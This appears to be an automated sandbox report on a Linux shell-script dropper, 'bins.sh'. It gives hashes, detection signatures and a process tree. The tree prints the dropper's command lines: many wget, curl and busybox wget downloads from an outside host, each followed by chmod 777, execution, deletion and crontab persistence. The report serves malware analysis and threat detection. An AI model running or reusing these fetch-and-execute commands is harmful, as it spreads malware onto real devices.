Analysis
- max time kernel: 150s
- max time network: 154s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 27-10-2024 14:47

Tasks
- Static task static1
- Behavioral task behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
- Behavioral task behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
- Behavioral task behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
- Behavioral task behavioral4: sample bins.sh, resource debian9-mipsel-20240611-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 5ad9fce74e2c2c2bc17e1c3c7c1e9699
- SHA1: f6a06bb0801544767f9542e687c8970f4da13169
- SHA256: 0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda
- SHA512: 70e49474c5684e1b77cc2e47abe567e6d5e8b0f7edfca79a7feefe0ae389462b6747c2841c31acb7168e04c121a563d887515cbdb75530dca80da2ade3b95d16
- SSDEEP: 192:MAM8A8b2OyaeCz0sbcqmss0xFw/3xe3rhxFw/3Vfqmsl3rD3A8b2OneCz0sT:MA0aeCz0sbcqmss0xFw/3oxFw/31qmsJ
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes:
- chmod, PIDs: 795, 810, 910, 936, 719, 862, 922, 711, 772, 782, 761, 852, 930, 740, 889, 898, 789, 749, 801, 830, 841, 677, 819, 870, 880, 904, 916, 728
Executes dropped EXE (3 IoCs)
Processes (ioc / pid / process):
- /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB / 678 / r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
- /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn / 843 / TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn
- /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB / 891 / r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
Renames itself (1 IoCs)
Processes (pid / process):
- 679 / r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
Creates/modifies Cron job (1 TTPs, 1 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes (description / ioc / process):
- File opened for modification / /var/spool/cron/crontabs/tmp.n8CLFG / crontab
Enumerates running processes
Discovers information about currently running processes on the system.
Checks CPU configuration (1 TTPs, 4 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
Processes (description / ioc / process):
- File opened for reading / /proc/cpuinfo / curl (4 times)
Reads runtime system information
Processes (description / ioc / process):
- File opened for reading / /proc/<pid>/cmdline / r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB, for pids 25, 723, 748, 865, 874, 18, 953, 688, 710, 837, 845, 928, 2, 13, 738, 757, 806, 22, 636, 804, 863, 737, 799, 803, 816, 701, 857, 4, 9, 14, 703, 936, 146, 265, 410, 724, 745, 951, 24, 777, 833, 908, 280, 896, 947, 212, 760, 792, 812, 704, 767, 902, 299, 755, 787, 798, 818, 871, 746
- File opened for reading / /proc/sys/crypto/fips_enabled / curl (2 times)
- File opened for reading / /proc/self/auxv / curl
- File opened for reading / /proc/filesystems / crontab (2 times)
System Network Configuration Discovery (1 TTPs, 64 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes (process, PIDs):
- curl: 660, 725, 914, 934, 876, 779, 799, 908, 805, 691, 920, 848, 825, 716, 836, 926, 745, 768, 736, 756, 787
- wget: 690, 785, 893, 804, 925, 835, 874, 913, 654, 743, 901, 919, 933, 856, 798, 755, 847, 884, 733, 823, 723
- busybox: 758, 897, 915, 727, 769, 903, 887, 909, 828, 851, 929, 800, 806, 921, 878, 781, 838, 693, 718
- rm: 812, 845
- TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn: 843
Writes file to tmp directory (2 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description / ioc / process):
- File opened for modification / /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB / curl
- File opened for modification / /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn / busybox
Processes
Each entry gives the PID, the image path, the command line (after "cmd:") and, in brackets, the signatures triggered by that process. Indentation shows the parent/child depth of the process tree.

- PID 644  /tmp/bins.sh  cmd: /tmp/bins.sh
  - PID 652  /bin/rm  cmd: rm bins.sh
  - PID 654  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [System Network Configuration Discovery]
  - PID 660  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [Checks CPU configuration; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 674  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 677  /bin/chmod  cmd: chmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [File and Directory Permissions Modification]
  - PID 678  /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  cmd: ./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [Executes dropped EXE; Renames itself; Reads runtime system information]
    - PID 680  /bin/sh  cmd: sh -c "crontab -l"
      - PID 681  /usr/bin/crontab  cmd: crontab -l  [Reads runtime system information]
    - PID 683  /bin/sh  cmd: sh -c "crontab -"
      - PID 684  /usr/bin/crontab  cmd: crontab -  [Creates/modifies Cron job; Reads runtime system information]
  - PID 686  /bin/rm  cmd: rm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 690  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  [System Network Configuration Discovery]
  - PID 691  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  [System Network Configuration Discovery]
  - PID 693  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  [System Network Configuration Discovery]
  - PID 711  /bin/chmod  cmd: chmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  [File and Directory Permissions Modification]
  - PID 712  /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  cmd: ./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 713  /bin/rm  cmd: rm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 715  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 716  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  [System Network Configuration Discovery]
  - PID 718  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  [System Network Configuration Discovery]
  - PID 719  /bin/chmod  cmd: chmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  [File and Directory Permissions Modification]
  - PID 721  /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  cmd: ./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 722  /bin/rm  cmd: rm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 723  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [System Network Configuration Discovery]
  - PID 725  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [System Network Configuration Discovery]
  - PID 727  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [System Network Configuration Discovery]
  - PID 728  /bin/chmod  cmd: chmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [File and Directory Permissions Modification]
  - PID 730  /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  cmd: ./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 731  /bin/rm  cmd: rm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 733  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  [System Network Configuration Discovery]
  - PID 736  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  [System Network Configuration Discovery]
  - PID 738  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 740  /bin/chmod  cmd: chmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  [File and Directory Permissions Modification]
  - PID 741  /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  cmd: ./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 742  /bin/rm  cmd: rm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 743  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  [System Network Configuration Discovery]
  - PID 745  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  [System Network Configuration Discovery]
  - PID 747  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 749  /bin/chmod  cmd: chmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  [File and Directory Permissions Modification]
  - PID 752  /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  cmd: ./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 753  /bin/rm  cmd: rm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 755  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [System Network Configuration Discovery]
  - PID 756  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [System Network Configuration Discovery]
  - PID 758  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [System Network Configuration Discovery]
  - PID 761  /bin/chmod  cmd: chmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [File and Directory Permissions Modification]
  - PID 764  /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  cmd: ./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 765  /bin/rm  cmd: rm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 766  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 768  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  [System Network Configuration Discovery]
  - PID 769  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  [System Network Configuration Discovery]
  - PID 772  /bin/chmod  cmd: chmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  [File and Directory Permissions Modification]
  - PID 774  /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  cmd: ./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 776  /bin/rm  cmd: rm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 778  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 779  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  [System Network Configuration Discovery]
  - PID 781  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  [System Network Configuration Discovery]
  - PID 782  /bin/chmod  cmd: chmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  [File and Directory Permissions Modification]
  - PID 783  /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  cmd: ./MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 784  /bin/rm  cmd: rm MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 785  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  [System Network Configuration Discovery]
  - PID 787  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  [System Network Configuration Discovery]
  - PID 788  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 789  /bin/chmod  cmd: chmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  [File and Directory Permissions Modification]
  - PID 790  /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  cmd: ./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 791  /bin/rm  cmd: rm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 792  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 793  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 794  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 795  /bin/chmod  cmd: chmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7  [File and Directory Permissions Modification]
  - PID 796  /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7  cmd: ./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 797  /bin/rm  cmd: rm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 798  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [System Network Configuration Discovery]
  - PID 799  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [System Network Configuration Discovery]
  - PID 800  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [System Network Configuration Discovery]
  - PID 801  /bin/chmod  cmd: chmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [File and Directory Permissions Modification]
  - PID 802  /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  cmd: ./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 803  /bin/rm  cmd: rm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 804  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery]
  - PID 805  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery]
  - PID 806  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery]
  - PID 810  /bin/chmod  cmd: chmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [File and Directory Permissions Modification]
  - PID 811  /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  cmd: ./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn
  - PID 812  /bin/rm  cmd: rm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery]
  - PID 813  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 815  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 817  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 819  /bin/chmod  cmd: chmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0  [File and Directory Permissions Modification]
  - PID 820  /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0  cmd: ./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 821  /bin/rm  cmd: rm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 823  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [System Network Configuration Discovery]
  - PID 825  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [System Network Configuration Discovery]
  - PID 828  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [System Network Configuration Discovery]
  - PID 830  /bin/chmod  cmd: chmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  [File and Directory Permissions Modification]
  - PID 832  /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj  cmd: ./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 833  /bin/rm  cmd: rm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj
  - PID 835  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery]
  - PID 836  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery]
  - PID 838  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 841  /bin/chmod  cmd: chmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [File and Directory Permissions Modification]
  - PID 843  /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  cmd: ./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [Executes dropped EXE; System Network Configuration Discovery]
  - PID 845  /bin/rm  cmd: rm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn  [System Network Configuration Discovery]
  - PID 847  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  [System Network Configuration Discovery]
  - PID 848  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  [System Network Configuration Discovery]
  - PID 851  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  [System Network Configuration Discovery]
  - PID 852  /bin/chmod  cmd: chmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  [File and Directory Permissions Modification]
  - PID 853  /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9  cmd: ./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 855  /bin/rm  cmd: rm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9
  - PID 856  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7  [System Network Configuration Discovery]
  - PID 858  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 860  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 862  /bin/chmod  cmd: chmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7  [File and Directory Permissions Modification]
  - PID 863  /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7  cmd: ./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 864  /bin/rm  cmd: rm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7
  - PID 865  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 867  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 869  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 870  /bin/chmod  cmd: chmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0  [File and Directory Permissions Modification]
  - PID 872  /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0  cmd: ./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 873  /bin/rm  cmd: rm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0
  - PID 874  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  [System Network Configuration Discovery]
  - PID 876  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  [System Network Configuration Discovery]
  - PID 878  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  [System Network Configuration Discovery]
  - PID 880  /bin/chmod  cmd: chmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  [File and Directory Permissions Modification]
  - PID 881  /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne  cmd: ./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 882  /bin/rm  cmd: rm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne
  - PID 884  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [System Network Configuration Discovery]
  - PID 886  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 887  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [System Network Configuration Discovery]
  - PID 889  /bin/chmod  cmd: chmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [File and Directory Permissions Modification]
  - PID 891  /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  cmd: ./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB  [Executes dropped EXE]
  - PID 892  /bin/rm  cmd: rm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB
  - PID 893  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  [System Network Configuration Discovery]
  - PID 894  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 897  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  [System Network Configuration Discovery]
  - PID 898  /bin/chmod  cmd: chmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  [File and Directory Permissions Modification]
  - PID 899  /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM  cmd: ./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 900  /bin/rm  cmd: rm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM
  - PID 901  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [System Network Configuration Discovery]
  - PID 902  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [Reads runtime system information]
  - PID 903  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [System Network Configuration Discovery]
  - PID 904  /bin/chmod  cmd: chmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  [File and Directory Permissions Modification]
  - PID 905  /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7  cmd: ./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 906  /bin/rm  cmd: rm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7
  - PID 907  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 908  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  [System Network Configuration Discovery]
  - PID 909  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  [System Network Configuration Discovery]
  - PID 910  /bin/chmod  cmd: chmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  [File and Directory Permissions Modification]
  - PID 911  /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn  cmd: ./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 912  /bin/rm  cmd: rm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn
  - PID 913  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  [System Network Configuration Discovery]
  - PID 914  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  [Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery]
  - PID 915  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  [System Network Configuration Discovery]
  - PID 916  /bin/chmod  cmd: chmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  [File and Directory Permissions Modification]
  - PID 917  /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7  cmd: ./MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 918  /bin/rm  cmd: rm MZGoABrnYnFu8Xp27oQs69simaihhOZfI7
  - PID 919  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [System Network Configuration Discovery]
  - PID 920  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery]
  - PID 921  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [System Network Configuration Discovery]
  - PID 922  /bin/chmod  cmd: chmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  [File and Directory Permissions Modification]
  - PID 923  /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI  cmd: ./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 924  /bin/rm  cmd: rm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI
  - PID 925  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  [System Network Configuration Discovery]
  - PID 926  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  [System Network Configuration Discovery]
  - PID 929  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  [System Network Configuration Discovery]
  - PID 930  /bin/chmod  cmd: chmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  [File and Directory Permissions Modification]
  - PID 931  /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy  cmd: ./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
